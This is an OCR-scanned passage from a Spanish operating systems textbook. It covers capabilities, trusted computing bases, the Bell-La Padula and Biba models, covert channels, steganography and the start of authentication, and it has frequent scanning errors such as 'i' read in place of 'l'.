1. Capacidad de copia: crea una nueva capacidad para el mismo objeto. 

2. Copiar objeto: crea un objeto duplicado con una nueva capacidad. 

3. Eliminar capacidad: elimina una entrada de la lista-C; el objeto no se ve afectado. 

4. Destruir objeto: elimina un objeto y una capacidad de manera permanente. 

Hay un último comentario que vale la pena hacer sobre los sistemas de capacidades: es muy 
difícil revocar el acceso a un objeto en la versión administrada por el kernel. Es difícil para el sis¬ 
tema encontrar todas las capacidades destacadas para cualquier objeto y quitárselas, ya que pueden 
estar almacenadas en listas-C por todo el disco. Un método es hacer que cada capacidad apunte a 
un objeto indirecto, en vez de que apunte al mismo objeto. Al hacer que el objeto indirecto apunte 
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al objeto real, el sistema siempre puede interrumpir esa conexión, con lo cual se invalidan las capa¬ 
cidades (cuando se presente después al sistema una capacidad para el objeto indirecto, el usuario 
descubrirá que el objeto indirecto apunta ahora a un objeto nulo). 

En el esquema deAmoeba es fácil revocar permisos. Todo lo que hay que hacer es cambiar el 
campo de comprobación almacenado con el objeto. De un solo golpe se invalidan todas las capaci¬ 
dades existentes. Sin embargo, ningún esquema permite una revocación selectiva: es decir, quitar el 
permiso a j ohn pero no el de los demás. Por lo general se reconoce que este defecto es un proble¬ 
ma con todos los sistemas de capacidades. 

Otro problema general es asegurar que el usuario de una capacidad válida no proporcione una 
copia a 1000 de sus mejores amigos. Este problema se resuelve al hacer que el kernel administre 
las capacidades, como en Hydra, pero esta solución no funciona bien en un sistema distribuido co¬ 
mo A moeba. 

En resumen, lasACLsy las capacidades tienen propiedades que se complementan en cierta for¬ 
ma. Las capacidades son eficientes debido a que, si un proceso dice "Abrir el archivo al que apun¬ 
ta la capacidad 3", no se necesita comprobación. Con lasACLs, tal vez se requiera una búsqueda 
(potencialmente extensa) en la ACL. Si no se aceptan los grupos, entonces para otorgar a todos el 
permiso de lectura para un archivo se requiere enumerar a todos los usuarios en laACL. Las capa¬ 
cidades también permiten encapsular un proceso con facilidad, mientras que lasACLs no. Por otro 
lado, lasACLs permiten la revocación selectiva de los permisos, y las capacidades no. Por último, 
si se elimina un objeto pero se dejan las capacidades, o si se eliminan las capacidades pero se deja 
el objeto, surgen problemas. LasACLs no sufren de este problema. 


9.3.4 Sistemas confiables 

En las noticias podemos leer todo el tiempo sobre virus, gusanos y otros problemas. Una persona 
ingenua podría hacer por lógica dos preguntas con respecto a estas cosas: 

1. ¿Es posible construir un sistema computacional seguro? 

2. De ser así, ¿por qué no se ha hecho? 

La respuesta a la primera pregunta es básicamente sí. Desde hace décadas se conoce la forma de 
construir un sistema seguro. Por ejemplo, el sistema M ULTICS que se diseñó en la década de 1960 
tenía la seguridad como uno de sus objetivos principales, y lo logró bastante bien. 

La cuestión del por qué no se están construyendo sistemas seguros es algo complicada, pero se 
resume en dos razones fundamentales. En primer lugar, los sistemas actuales no son seguros pero 
los usuarios no desean descartarlos. Si M icrosoft anunciara que además de Windows tiene un nue¬ 
vo producto llamado SOSeguro, que sea resistente a los virus pero no ejecute aplicaciones Win¬ 
dows, es muy poco probable que todas las personas y empresas dejen de utilizar Windows y 
compren el nuevo sistema de inmediato. De hecho, M icrosoft tiene un SO seguro (Fandrich y co¬ 
laboradores, 2006), pero no lo comercializa. 
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La segunda cuestión es más sutil. La única forma conocida de construir un sistema seguro es 
mantenerlo simple. Las características son enemigas de la seguridad. Los diseñadores de sistemas 
creen (pueden estar equivocados o no) que los usuarios quieren más características. Esto significa 
más complejidad, más código, más errores y más errores de seguridad. 

He aquí dos ejemplos simples. Los primeros sistemas de correo electrónico enviaban mensajes 
en forma de texto A SCI I. E ran completamente seguros. N o hay nada que pueda hacer un mensaje en¬ 
trante en código ASCII para dañar un sistema de cómputo. Después las personas tuvieron la idea de 
expandir el correo electrónico para incluir otros tipos de documentos. Por ejemplo, archivos 
de Word, que pueden contener programas en macros. Leer un documento de ese tipo significa eje¬ 
cutar el programa de alguien más en su computadora. No importa cuántas cajas de arena se útil icen, 
ejecutar un programa externo en su computadora es mucho más peligroso que ver texto ASCII. 
¿Exigieron los usuarios la habilidad de cambiar el correo electrónico para que enviara programas 
activos en vez de documentos pasivos? Probablemente no, pero los diseñadores de sistemas creye¬ 
ron que sería una idea ingeniosa, sin preocuparse mucho por las implicaciones de seguridad. 

El segundo ejemplo es igual para las páginas Web. Cuando el servicio Web consistía en pági¬ 
nas de HTM L pasivas, no imponía un problema grave de seguridad. A hora que muchas páginas Web 
contienen programas (applets) que el usuario tiene que ejecutar para ver el contenido, aparece una 
fuga de seguridad tras otra. Tan pronto como se corrige una, otra toma su lugar. Cuando el servicio 
Web era completamente estático, ¿los usuarios demandaban contenido dinámico? No según lo que 
el autor recuerda, pero la introducción del contenido dinámico trajo consigo múltiples de problemas 
de seguridad. Parece como si el vicepresidente a cargo de decir "No" estuviera dormido en su si¬ 
llón. 

En realidad, hay varias organizaciones que piensan que es más importante una buena seguri¬ 
dad que características nuevas e ingeniosas, y los militares son el ejemplo principal. En las siguien¬ 
tes secciones analizaremos algunas de las cuestiones involucradas, pero se pueden sintetizar en un 
solo enunciado. Para construir un sistema seguro, hay que tener un modelo de seguridad en el nú¬ 
cleo del sistema operativo que sea lo bastante simple como para que los diseñadores puedan com¬ 
prenderlo de verdad, y que resistan toda la presión de desviarse de este modelo para agregar nuevas 
características. 

9.3.5 Base de cómputo confiable 

En el mundo de la seguridad, todos hablan con frecuencia sobre los sistemas confiables en vez de 
sistemas seguros. Éstos son sistemas que han declarado formalmente requerimientos de seguridad y 
cumplen con ellos. En el centro de todo sistema confiable hay una TCB (Trusted Computing Base, 
Base de cómputo confiable) mínima que consiste en el hardware y software necesarios para cumplir 
con todas las reglas de seguridad. Si la base de cómputo confiable funciona según las especificacio¬ 
nes, no se puede comprometer la seguridad el sistema, sin importar qué otra cosa esté mal. 

Por lo general, la TCB consiste en la mayoría del hardware (excepto los dispositivos de E/S que 
no afectan a la seguridad), una porción del kernel del sistema operativo, y la mayoría o todos los pro¬ 
gramas de usuario que tienen poder de superusuario (por ejemplo, los programas raíz SETUID en 
UNIX). Las funciones del sistema operativo que deben formar parte de la TCB son: creación de pro¬ 
cesos, cambio de procesos, administración del mapa de memoria y parte de la administración de 
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archivos y de la E/S. En un diseño seguro es frecuente que laTCB esté muy separada del resto del 
sistema operativo para poder minimizar su tamaño y verificar que sea correcto. 

El monitor de referencia es una parte importante de laTCB, como se muestra en la figura 9-11. 
El monitor de referencia acepta todas las llamadas al sistema relacionadas con la seguridad (como 
abrir archivos), y decide si se deben procesar o no. Por ende, el monitor de referencia permite que 
todas las decisiones de seguridad se coloquen en un solo lugar, sin posibilidad de pasarlo por alto. 
La mayoría de los sistemas operativos están diseñados de esta forma, lo cual es una de las razones 
por las que son tan inseguros. 


Proceso de usuario 


Todas las llamadas ai sistema pasan 
por el monitor de referencia para 
comprobar la seguridad 








Monitor de referencia 

Base de cómputo confiable 

Kernel del sistema operativo 


^ Espacio 
de usuario 


^ Espacio 
de kernel 


Figura 9-11. U n monitor de referencia. 

Uno de los objetivos de cierta investigación actual de seguridad es reducir la base de cómputo 
confiable, de millones de líneas de código a unas cuantas decenas de miles. En la figura 1-26 vimos 
la estructura del sistema operativo MINIX 3, el cual es un sistema que se conforma a POSIX pero 
tiene una estructura radicalmente distinta a la de Linux o FreeBSD. Con M INIX 3, sólo se ejecutan 
aproximadamente 4000 líneas de código en el kernel. Todo lo demás se ejecuta como un conjunto 
de procesos de usuario. A Igunos de estos procesos, como el sistema de archivos y el administrador de 
procesos, forman parte de la base de cómputo confiable debido a que pueden comprometer con fa¬ 
cilidad la seguridad del sistema. Pero otras partes como el driver de impresora y el driver de audio 
no forman parte de la base de cómputo confiable, y no importa cuál sea su problema (incluso si un 
virus se apodera de ellos), no hay nada que se pueda hacer para comprometer la seguridad del sis¬ 
tema. Al reducir la base de cómputo confiable por dos órdenes de magnitud, los sistemas como M I- 
NIX 3 pueden ofrecer en potencia una seguridad mucho mayor que los diseños convencionales. 

9.3.6 M odelos formales de los sistemas seguros 

Las matrices de protección como la déla figura 9-5 no son estáticas. Cambian con frecuencia a me¬ 
dida que se crean objetos, los objetos antiguos se destruyen y los propietarios deciden aumentar o 
restringir el conjunto de usuarios para sus objetos. Se ha puesto mucha atención en el modelado de 





















SECCION 9.3 


MECANISMOS DE PROTECCION 


633 


los sistemas de protección, en ios cuaies ia matriz de protección cambia de manera constante. A ho¬ 
ra daremos un vistazo a una parte de este trabajo. 

Hace unas décadas, Harrison y sus coiaboradores (1976) identificaron seis operaciones primi¬ 
tivas en ia matriz de protección, que se pueden utiiizar como base para modeiar cuaiquier sistema 
de protección. Estas operaciones primitivas son create object, delete object, cneate domain, de¬ 
late domain, insert right y remove right. Las úitimas dos primitivas insertan y eiiminan permisos 
de eiementos específicos de ia matriz, como ai otorgar ai dominio 1 permiso para ieer ei ArchivoG. 

Estas seis primitivas se pueden combinar en comandos de protección. Los programas de usuario 
pueden ejecutar estos comandos de protección para cambiar ia matriz. No pueden ejecutar ias primiti¬ 
vas en forma directa. Por ejempio, ei sistema podría tener un comando para crear un nuevo archivo, ei 
cuai reaiizaría una prueba para ver si ei archivo ya existe, y en caso contrario crearía un nuevo objeto 
y proporcionaría ai propietario todos ios permisos sobre éi. También podría haber un comando para per¬ 
mitir ai usuario otorgar permiso para ieer ei archivo a todos ios usuarios en ei sistema, io que en efec¬ 
to insertaría ei permiso "iectura" en ia entrada dei nuevo archivo en todos ios dominios. 

En cuaiquier instante, ia matriz determina qué es io que puede hacer un proceso en un domi¬ 
nio, no io que está autorizado para hacer. La matriz es io queei sistema hacecumpiir; ia autorización 
está reiacionada con ia directiva de administración. Como ejempio de esta distinción, consideremos 
ei sistema simpiede ia figura 9-12, en ei cuai ios dominios corresponden a ios usuarios. En ia figu¬ 
ra 9-12(a) podemos ver ia directiva de protección deseada: H enry puede ieer y escribir en bandeja- 
correo?, Robert puede ieer y escribir en secreto y ios tres usuarios pueden ieer y ejecutar 
compiiador. 


Objetos Objetos 


Compilador Bandejacorreo? Secreto Compilador BandejacorreoZ Secreto 


Eric 

Lectura 

Ejecución 



Eric 

Lectura 

Ejecución 



Henry 

Lectura 

Ejecución 

Lectura 

Escritura 


Henry 

Lectura 

Ejecución 

Lectura 

Escritura 


Robert 

Lectura 

Ejecución 


Lectura 

Escritura 

Robert 

Lectura 

Ejecución 

Lectura 

Lectura 

Escritura 


(a) (b) 


Figura 9-12. (a) U n estado autorizado, (b) U n estado no autorizado. 


Ahora imagine que Robert es muy iisto y ha descubierto cómo emitir comandos para cambiar 
ia matriz, de manera que sea como en la figura 9-12(b). Ahora ei tiene acceso a bandejacorreo?, ai- 
go que no está autorizado para tener. Si trata de ieer este archivo, ei sistema operativo iievará a ca¬ 
bo su petición debido a que no sabe que ei estado de ia figura 9-12(b) es no autorizado. 

A hora debe tener ciaro que ei conjunto de todas ias matrices posibies se puede particionar en 
dos conjuntos desunidos: ei conjunto de todos ios estados autorizados y ei conjunto de todos ios es¬ 
tados no autorizados. Una pregunta sobre ia que ha girado mucha investigación teórica es: "Dado 
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un estado inicial autorizado y un conjunto de comandos, ¿se puede probar que el sistema nunca po¬ 
drá llegar a un estado no autorizado?". 

En efecto, estamos preguntando si el mecanismo disponible (los comandos de protección) es 
adecuado para implementar una directiva de protección. Dada esta directiva, cierto estado inicial de 
la matriz y el conjunto de comandos para modificarla, lo conveniente sería una forma de probar que 
el sistema es seguro. Dicha prueba resulta ser muy difícil de adquirir: muchos sistemas de propósi¬ 
to general no son seguros en teoría. Harrison y sus colaboradores (1976) demostraron que en el ca¬ 
so de una configuración arbitraria para un sistema de protección arbitrario no se puede establecer 
la seguridad de manera teórica. Sin embargo, para un sistema específico es posible demostrar si el 
sistema puede pasar en algún momento dado de un estado autorizado a un estado no autorizado. Pa¬ 
ra obtener más información, consulte a Landwehr (1981). 

9.3.7 Seguridad multinivel 

La mayoría de los sistemas operativos permiten a los usuarios individuales determinar quién puede 
leer y escribir en sus archivos y demás objetos. A esta directiva se le conoce como control de ac¬ 
ceso discrecional. En muchos entornos este modelo funciona bien, pero hay otros en donde se 
requiere una seguridad más estricta, como en la computación militar, los departamentos de paten¬ 
tes corporativas y los hospitales. En estos entornos, la organización ha establecido reglas sobre qué 
es lo que puede ver cada quién, y los soldados, abogados o doctores no pueden modificar estas re¬ 
glas, por lo menos no sin antes obtener un permiso especial del jefe. Estos entornos necesitan con¬ 
troles de acceso obligatorio para asegurar que el sistema impíamente las directivas de seguridad 
establecidas, además de los controles de acceso discrecional estándar. Lo que hacen estos controles 
de acceso obligatorio es regular el flujo de información, para asegurar que no se fugue de una ma¬ 
nera que no esté considerada. 

El modelo Bell-La Padula 

El modelo de seguridad multinivel más utilizado en el mundo es el modelo Bell-La Padula, por lo 
que empezaremos con él (Bell y La Padula, 1973). Este modelo se diseñó para manejar la seguri¬ 
dad militar, pero también se puede aplicar a otras organizaciones. En el mundo militar, los docu¬ 
mentos (objetos) pueden tener un nivel de seguridad, como no clasificado, confidencial, secreto y 
de alta confidencialidad. A las personas también se les asignan estos niveles, dependiendo de los 
documentos que puedan ver. U n general podría tener permiso para ver todos los documentos, mien¬ 
tras que a un teniente se le podría restringir a todos los documentos clasificados como confidencia¬ 
les o con un nivel menor de seguridad. Un proceso que se ejecute a beneficio de un usuario adquiere 
el nivel de seguridad del usuario. Como hay varios niveles de seguridad, a este esquema se le co¬ 
noce como sistema de seguridad multinivel. 

El modelo Bell-La Padula tiene reglas sobre la forma en que debe fluir la información: 

1. La propiedad de seguridad simple Un proceso que se ejecuta en el nivel de seguridad k 
sólo puede leer objetos que estén en su nivel o en uno menor. Por ejemplo, un general pue- 
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de leer los documentos de un teniente, pero un teniente no puede ieer ios documentos de un 
generai. 

2. La propiedad * Un proceso que se ejecuta en ei nivei de seguridad k sóio puede escribir ob¬ 
jetos en su nivei o en uno mayor. Por ejempio, un teniente puede adjuntar un mensaje en ia 
bandeja de correo de un generai para decide todo io que sabe, pero un generai no puede ad¬ 
juntar un mensaje en ia bandeja de correo de un teniente para decide todo io que sabe, ya 
que ei generai puede haber visto documentos de aita confidenciaiidad que no se pueden di- 
vuigar a un teniente. 

En síntesis, ios procesos pueden ieer en niveies menores y escribir en niveies mayores, pero no ai 
revés. Si ei sistema impiementa con rigor estas dos propiedades, se puede demostrar que no puede 
haber fuga de información de un nivei de seguridad más aito a uno más bajo. La propiedad * sede- 
nominó así debido a que en ei informe originai, ios autores no podían idear un buen nombre para 
eiia y utiiizaron * como un receptácuio temporai hasta que pudieran idear un nuevo nombre. Nun¬ 
ca io hicieron, y ei informe se imprimió con ei *. En este modeio, ios procesos ieen y escriben ob¬ 
jetos, pero no se comunican entre sí de una manera directa. Ei modeio Beii-La Paduia se iiustra en 
modo gráfico en ia figura 9-13. 


Nivel de seguridad 


Leyenda 




Figura 9-13. El modelo de seguridad multinivel Bell-La Paduia. 


En esta figura, una fiecha (sóiida) de un objeto a un proceso indica que ei proceso está ieyen- 
do ei objeto: es decir, i a información fiuye dei objeto ai proceso. De manera simiiar, una fiecha 
(punteada) de un proceso a un objeto indica que ei proceso está escribiendo en ei objeto: es decir. 
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la información fiuye dei proceso ai objeto. Por ende, toda ia información fiuye en ia dirección de 
ias fiechas. Por ejempio, ei proceso B puede ieer dei objeto 1, pero no dei objeto 3. 

La propiedad de seguridad simpieestabiece que todas ias fiechas sóiidas (iectura) deben ir ha¬ 
cia ios iados o hacia arriba. La propiedad * estabiece que todas ias fiechas punteadas (escritura) 
también van hacia ios iados o hacia arriba. Como ia información fiuye sóio en forma horizontai o 
hacia arriba, cuaiquier información que empieza en ei nivei k no puede aparecer en un nivei infe¬ 
rior. En otras paiabras, nunca hay una ruta que mueva información hacia abajo, con io cuai se ga¬ 
rantiza ia seguridad dei modeio. 

Ei modeio Beii-La Paduia hace referencia a ia estructura organizacionai, pero en úitima instan¬ 
cia ei sistema operativo es quien tiene que impiementario. Una manera de hacerio es asignar a ca¬ 
da usuario un nivei de seguridad, que se debe aimacenar junto con otros datos específicos dei 
usuario, como ei UID y ei GID. Ai momento de iniciar sesión, ei sheii dei usuario adquiere su ni¬ 
vei de seguridad, y todos sus hijos io heredan. Si un proceso que se ejecuta en ei nivei de seguridad 
k trata de abrir un archivo u otro objeto cuyo nivei de seguridad sea mayor que k, ei sistema opera¬ 
tivo debe rechazar ei intento de apertura. Todos ios intentos simiiares de abrir cuaiquier objeto de 
un nivei de seguridad menor que k para escribir en éi deben faiiar. 


El modelo Biba 

Para sintetizar ei modeio Beii-La Paduia en términos miiitares, un teniente puede pedir a un soida- 
do raso que reveie todo io que sabe, para después copiar esta información en ei archivo de un ge- 
nerai sin vioiar ia seguridad. Ahora usemos ei mismo modeio en términos de civiies. Imagine una 
empresa en ia que ios conserjes tienen ei nivei de seguridad 1, ios programadores tienen ei nivei de 
seguridad 3 y ei presidente de ia empresa tiene ei nivei de seguridad 5. M ediante ei uso dei mode¬ 
io Beii-La Paduia, un programador puede consuitar con un conserje sobre ios futuros pianes de ia 
empresa y después sobrescribir ios archivos dei presidente que contengan ia estrategia corporativa. 
No todas ias empresas se sentirían iguai de entusiasmadas con este modeio. 

Ei probiema con ei modeio Beii-La Paduia es que se ideó para guardar secretos, no para garan¬ 
tizar ia integridad de ios datos. Para esto úitimo necesitamos precisamente ias propiedades inversas 
(Biba, 1977): 

1. El principio de integridad simple Un proceso que se ejecuta en ei nivei de seguridad k só¬ 
io puede escribir objetos en su nivei o en uno inferior (no hay escrituras hacia arriba). 

2. La propiedad * de integridad Un proceso que se ejecute en ei nivei de seguridad k puede 
ieer sóio ios objetos en su nivei o en uno superior (no hay iecturas hacia abajo). 

En conjunto, estas propiedades aseguran que ei programador pueda actuaiizar ios archivos dei con¬ 
serje con ia información adquirida dei presidente, pero no viceversa. Desde iuego que ciertas orga¬ 
nizaciones desean tanto ias propiedades de Beii-La Paduia como ias de Biba, pero como están en 
confiicto directo, es difícii de obtener ias propiedades de ambos modeios a ia vez. 
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9.3.8 Canales encubiertos 

Todas estas ideas sobre modelos formal es y sistemas definitivamente seguros suenan bien, pero ¿en 
realidad funcionan? En una palabra: no. Aun en un sistema que tenga un modelo de seguridad sub¬ 
yacente, que haya demostrado ser seguro y que esté i mplementado en forma correcta, puede haber 
fugas de seguridad. En esta sección analizaremos cómo puede haber fuga de información incluso 
cuando se haya demostrado con rigor que dicha fuga es matemáticamente imposible. Estas ideas se 
deben a Lampson (1973). 

El modelo de Lampson se formuló originalmente en términos de un solo sistema de tiempo 
compartido, pero se pueden adaptar las mismas ideas a las LANs y otros entornos multiusuario. En 
su forma más pura, implica tres procesos en cierta máquina protegida. El primer proceso (el clien¬ 
te) desea que el segundo (el servidor) realice cierto trabajo. El cliente y el servidor no confían com¬ 
pletamente uno en el otro. Por ejemplo, el trabajo del servidor es ayudar a que los clientes llenen 
sus formularios fiscales. A los clientes les preocupa que el servidor registre en secreto sus datos fi¬ 
nancieros: por ejemplo, para mantener una lista secreta de cuánto gana cada quién, y después ven¬ 
der la lista. Al servidor le preocupa que los clientes traten de robar el valioso programa fiscal. 

El tercer proceso es el colaborador, que está conspirando con el servidor para robar los datos 
confidenciales de los clientes. Por lo general, el colaborador y el servidor son propiedad de la mis¬ 
ma persona. Estos tres procesos se muestran en la figura 9-14. El objeto de este ejercicio es diseñar 
un sistema en el quesea imposible que el proceso servidor filtre al proceso colaborador la informa¬ 
ción que ha recibido de manera legítima del proceso cliente. A este problema, Lampson lo llamó 
problema del confinamiento. 


Cliente Servidor Colaborador Servidor encapsulado 




Figura 9-14. (a) Los procesos cliente, servidor y colaborador, (b) El servidor encap¬ 
sulado puede seguir filtrando la información al colaborador a través de los canales en¬ 
cubiertos. 


Desde el punto de vista del diseñador, el objetivo es encapsular o confinar el servidor de tal for¬ 
ma que no pueda pasar información al colaborador. M ediante el uso de un esquema de matriz de 
protección, podemos garantizar con facilidad que el servidor no se podrá comunicar con el colabo¬ 
rador mediante la escritura de un archivo para el que el colaborador tiene acceso de lectura. Es pro¬ 
bable que también podamos asegurar que el servidor no se podrá comunicar con el colaborador 
mediante el uso del mecanismo de comunicación entre procesos del sistema. 
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Por desgracia también pueden existir canaies de comunicación más sutiies. Por ejempio, ei ser¬ 
vidor puede tratar de comunicar un fiujo de bits binario de ia siguiente manera. Para enviar un bit 
1, reaiiza todos ios cáicuios que pueda durante un intervaio fijo. Para enviar un bit 0, permanece 
inactivo durante ia misma cantidad de tiempo. 

Ei coiaborador puede tratar de detectar ei fiujo de bits ai monitorear cuidadosamente su tiem¬ 
po de respuesta. En generai, obtendrá una mejor respuesta cuando ei servidor envíe un 0 que cuan¬ 
do envíe un 1. Este canai de comunicación se conoce como canal encubierto, y se iiustra en ia 
figura 9-14(b). 

Desde iuego que ei canai encubierto es un canai ruidoso, que contiene mucha información ex¬ 
traña, pero ésta se puede enviar de manera confiabie a través de un canai ruidoso si se utiiiza un có¬ 
digo de corrección de errores (por ejempio, un código de Hamming o inciusiveaigo más sofisticado). 
A i utiiizar un código de corrección de errores se reduce aún más ei ancho de banda (que de por sí es 
bajo) dei canai encubierto, pero de todas formas puede ser suficiente como para fiitrar una cantidad 
considerabie de información. Es bastante obvio que ningún modeio de protección basado en una ma¬ 
triz de objetos y dominios podrá evitar este tipo de fuga. 

La moduiación dei uso de ia CPU no es ei único canai encubierto. La veiocidad de pagina¬ 
ción también se puede moduiar (muchos faiios de página para un 1, ningún faiio de página para 
un 0). De hecho, casi cuaiquier forma de degradar ei rendimiento dei sistema de una manera sin¬ 
cronizada puede ser candidato. Si ei sistema proporciona una forma de bioquear ios archivos, en¬ 
tonces ei servidor puede bioquear cierto archivo para indicar un 1, y desbioqueario para indicar 
un 0. En aigunos sistemas es posibie que un proceso detecte ei estado de un bioqueo, inciuso en 
un archivo que no pueda utiiizar. Este canai encubierto se muestra en ia figura 9-15, en donde ei 
archivo se bioquea o se desbioquea durante cierto intervaio fijo, conocido para ei servidor y pa¬ 
ra ei coiaborador. En este ejempio se está transmitiendo ei fiujo de bits secreto 11010100. 


Servidor ■ 


El servidor 
bloquea el 
archivo para 
enviar un 1 




D 


Colaborador 










Tiempo —► 


El servidor 
desbloquea 
el archivo para 
enviar un 0 

Flujo de bits 
que se está 
enviando 


Figura 9-15. U n canal encubierto que utiliza bloqueo de archivos. 


Bioquear y desbioquear un archivo S preparado con anticipación no es un canai especiaimente 
ruidoso, pero sí requiere de una sincronización bastante precisa, a menos que ia veiocidad de bits 
sea muy baja. La confiabiiidad y ei rendimiento se pueden incrementar inciuso más si se utiiiza un 
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protocolo de reconocimiento. Este protocoio utiiiza otros dos archivos (F1 y F2) bioqueados por ei 
servidor y ei coiaborador, respectivamente, para mantener ios dos procesos sincronizados. Después 
de que ei servidor bioquea o desbioquea S, cambia ei estado de bioqueo de F1 para indicar que se 
ha enviado un bit. Después de que ei coiaborador iee ei bit, cambia ei estado de bioqueo de F 2 pa¬ 
ra indicar ai servidor que está iisto para recibir otro bit, y espera hasta que se cambia otra vez ei bio¬ 
queo de F1 para indicar que hay otro bit presente en S. Este protocoio es muy confiabie ya que 
no requiere sincronización, inciusiveen un sistema ocupado, y puede proceder con tanta rapidez co¬ 
mo se puedan programar ios dos procesos. Para obtener un ancho de banda más aito, ¿por qué no 
utiiizamos dos archivos por cada bit, o creamos un canai con anchura de un byte y ocho archivos 
de señaiización, de SO hasta S7? 

La adquisición y iiberación de ios recursos dedicados (unidades de cinta y piotters, por ejem- 
pio) también se pueden utiiizar para ia señaiización. Ei servidor adquiere ei recurso para enviar un 
1 y io i ibera para enviar un 0. En U NIX, ei servidor podría crear un archivo para indicar un 1 y eii- 
minario para indicar un 0; ei coiaborador podría utiiizar ia iiamada ai sistema access para ver si ei 
archivo existe. Esta iiamada funciona inciuso si ei coiaborador no tiene permiso para usar ei archi¬ 
vo. Por desgracia existen muchos canaies encubiertos. 

Lampson también mencionó una forma defiitrar información ai propietario (humano) dei pro¬ 
ceso servidor. Se supone que ei proceso servidor tiene ei derecho de indicar a su propietario cuán¬ 
to trabajo reaiizó porei ciiente, para poder cobrade. Si ia factura por ei cáicuio reaiizado es de $100 
por ejempio, y ei ingreso dei ciiente es de $53,000, ei servidor podría reportar ia factura como de 
$100.53 a su propietario. 

Si es muy difícii tan sóio encontrar todos ios canaies encubiertos, es mucho más difícii bio- 
quearios. En ia práctica no se puede hacer mucho. La acción de introducir un proceso que produz¬ 
ca faiios de página ai azar o que invierta su tiempo de cuaiquier otra forma que degrade ei 
rendimiento dei sistema, para poder reducir ei ancho de banda de ios canaies encubiertos, no es una 
proposición atractiva. 


E steganografía 

Se puede utiiizar un tipo iigeramente distinto de canai encubierto para pasar información secreta en¬ 
tre procesos, inciuso cuando un humano o un censor automatizado pueda inspeccionar todos ios 
mensajes entre ios procesos y vetar ios que sean sospechosos. Por ejempio, considere una empresa 
que comprueba en forma manuai todo ei correo eiectrónico sai i ente que envían sus empieados, pa¬ 
ra asegurar que no estén fiitrando secretos a sus cómpiices o competidores fuera de ia empresa. 
¿Existe aiguna forma de que un empieado contrabandee voiúmenes considerabies de información 
confidenciai justo debajo de ia nariz dei censor? Resuita ser que sí ia hay. 

Considere ia figura 9-16(a) como un buen ejempio. Esta fotografía que tomó ei autor en Ke- 
nya contiene tres cebras que contempian un árboi. La figura 9-16(b) parece tener ias mismas tres 
cebras y ei mismo árboi acacia, pero se ie agregó una atracción adicionai. Contiene ei texto íntegro 
de cinco obras de Shakespeare: Flamiet, Ei Rey Lear, M acbeth, Ei mercader de Venecia y j uiio Cé¬ 
sar. En conjunto, estas obras contienen más de 700 KB de texto. 
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Figura 9-16. (a) Tres cebras y un árbol, (b) Tres cebras, un árbol y el texto completo 
de cinco obras de William Shakespeare. 


¿Cómo funciona este canal encubierto? La imagen de color original es de 1024 x 768 pixeles. 
Cada pixel consiste en tres números de 8 bits, uno para cada intensidad de color rojo, verde y azul 
de ese pixel. El color del píxel se forma mediante la superposición lineal de los tres colores. El mé¬ 
todo de codificación utiliza el bit de menor orden de cada valor de color RGB como un canal encu¬ 
bierto. Así, cada píxel tiene espacio para 3 bits de información secreta, uno en el valor rojo, otro en 
el valor verde y uno más en el valor azul. En una imagen de este tamaño se pueden almacenar has¬ 
ta 1024 X 768 X 3 bits (294,912 bytes) de información secreta. 

El texto completo de las cinco obras y un aviso corto suman 734,891 bytes. Esto se comprimió 
primero a cerca de 274 KB mediante el uso de un algoritmo de compresión estándar. Después, 
el resultado comprimido se cifró y se insertó en los bits de menor orden de cada valor de color. Co¬ 
mo se puede ver (o en realidad, no se puede), la existencia de la información es completamente in¬ 
visible. Es igual de invisible en la versión grande a color de la foto. El ojo no puede distinguir con 
facilidad el color de 7 bits del color de 8 bits. Una vez que el archivo de imagen logra burlar al cen¬ 
sor, el receptor sólo extrae todos los bits de menor orden, aplica los algoritmos de cifrado y des¬ 
compresión, y recupera los 734,891 bytes originales. Al proceso de ocultar la existencia de 
información de esta manera se le conoce como esteganografía (de las palabras griegas para "escri¬ 
tura encubierta"). La esteganografía no es popular en las dictaduras que tratan de restringir la co¬ 
municación entre sus ciudadanos, pero si lo es popular con las personas que creen firmemente en la 
libertad de expresión. 

Ver las dos imágenes en blanco y negro con baja resolución en realidad no hace justicia para 
expresar el poder que tiene esta técnica. Para que el lector tenga una idea más concisa sobre la for¬ 
ma en que funciona la esteganografía, el autor ha preparado una demostración, incluyendo la ima¬ 
gen a todo color de la figura 9-16(b) con las cinco obras incrustadas. La demostración se puede ver 
en www.cs.vu.nl/~ast. Haga clic en el vínculo covered writinq bajo la sección STEGANOGRAPHY 
DEM 0. Después siga las instrucciones en esa página para descargar la imagen y las herramientas 
de esteganografía necesarias para extraer las obras. 
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Otro de los usos de la esteganografía es para insertar marcas de agua ocultas en las imáge¬ 
nes que se utilizan en páginas Web para detectar su robo y reutilizarlas en otras páginas Web. Si 
su página Web contiene una imagen con el mensaje secreto "Copyright 2008, General Images 
Corporation", tal vez tenga problemas para convencer a un juez que usted fue quien produjo la 
imagen. También se pueden aplicar marcas de agua en la música, las películas y otros tipos de 
materiales. 

Desde luego que el hecho de que las marcas de agua se utilicen de esta forma anima a cier¬ 
tas personas a buscar maneras de quitarlas. Para vencer un esquema que almacena información 
en los bits de menor orden de cada píxel, se gira la imagen 1 grado en sentido a favor de las ma¬ 
necillas del reloj y después se convierte a un sistema con pérdidas como JPEG. Luego se gira 
1 grado en sentido contrario. Por último, la imagen se puede volver a convertir al sistema de co¬ 
dificación original (como gif, bmp o tif). La conversión a j PEG con pérdidas desordenará los bits 
de menor orden y los giros requieren muchos cálculos de punto flotante, los cuales introducen 
errores de redondeo y agregan ruido a los bits de menor orden. Las personas que ponen las mar¬ 
cas de agua saben esto (o deberían saberlo), por lo que colocan su información de copyright de 
manera redundante y utilizan otros esquemas además de sólo usar los bits de menor orden de los 
píxeles. A su vez, esto estimula a los atacantes para que busquen mejores técnicas de remoción. 
Y esto nunca acaba. 


9.4 AUTENTICACIÓN 

Todo sistema computacional seguro debe requerir que todos los usuarios se autentiquen al momen¬ 
to de iniciar sesión. Después de todo, si el sistema operativo no puede estar seguro de quién es el 
usuario, tampoco puede saber a qué archivos y otros recursos puede acceder. A unque la autentica¬ 
ción puede parecer un tema trivial, es un poco más complicado délo que se podría esperar. Siga le¬ 
yendo. 

La autenticación de los usuarios es una de las cosas que queríamos expresar con lo de "la on¬ 
togenia recapitula la filogenia" en la sección 1.5.7. Las primeras mainframes como ENIAC no te¬ 
nían un sistema operativo, mucho menos un procedimiento de inicio de sesión. Los posteriores 
sistemas mainframe de procesamiento por lotes y tiempo compartido tenían por lo general un pro¬ 
cedimiento de inicio de sesión para autenticar los trabajos y los usuarios. 

